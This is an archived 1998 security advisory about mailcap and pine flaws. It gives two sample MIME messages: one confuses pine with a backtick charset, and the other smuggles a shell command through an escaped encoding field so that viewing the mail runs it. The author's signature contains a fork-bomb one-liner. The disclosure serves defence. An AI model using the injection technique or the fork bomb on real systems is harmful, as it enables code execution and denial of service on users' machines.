The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


mailrc and pine security holes


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
X-RDate: Mon, 06 Apr 1998 10:09:14 +0600 (ESD)
Date: Sun, 5 Apr 1998 15:25:25 +0200
From: Michal Zalewski <[email protected]>
To: [email protected]
Subject: mailrc and pine security holes

Many of mailcap-compatible unix mail clients have several security holes.
Mailcap mechanism is usually so poorly implemented that it's possible
to perform wida range of attacks - from 'harmless' messing on screen,
through executing specific commands with arbitrary parameters,
even to executing *arbitrary* commands via e-mail message.

Here are examples, both tested under Linux RH 5.0 distribution (mailcap
1.0.6, pine 3.96):



Example 1 (light) - pine 3.96 confusion
Following example demostrates how to cause a few 'mostly harmless' errors due to the improper expansion of ` character by pine - it's just annoying, because you can't view this mail properly, but I have no idea if it's exploitable: **** SAMPLE MIME MESSAGE **** MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0007_01BD5F09.B6797740" ------=_NextPart_000_0007_01BD5F09.B6797740 Content-Type: text/plain; charset="crashme`" Content-Transfer-Encoding: quoted-printable Hellow! ------=_NextPart_000_0007_01BD5F09.B6797740-- **** END OF EXAMPLE ***
Example 2 (heavy) - execution of arbitrary code
That's something even more dangerous - following MIME mail, when viewed, executes 'touch /tmp/BIG_HOLE' (bug lies in metamail script): **** SAMPLE MIME MESSAGE **** MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0007_01BD5F09.B6797740" ------=_NextPart_000_0007_01BD5F09.B6797740 Content-Type: default; encoding="\\\"x\\\"\ ==\ \\\"x\\\"\ \)\ touch\ \/tmp/BIG_HOLE" Content-Transfer-Encoding: quoted-printable Hellow!!! ------=_NextPart_000_0007_01BD5F09.B6797740-- **** END OF EXAMPLE **** _______________________________________________________________________ Michal Zalewski [[email protected]] <= finger for pub PGP key Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] [echo "\$0&\$0">_;chmod +x _;./_] <=------=> [tel +48 (0) 22 813 25 86]

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру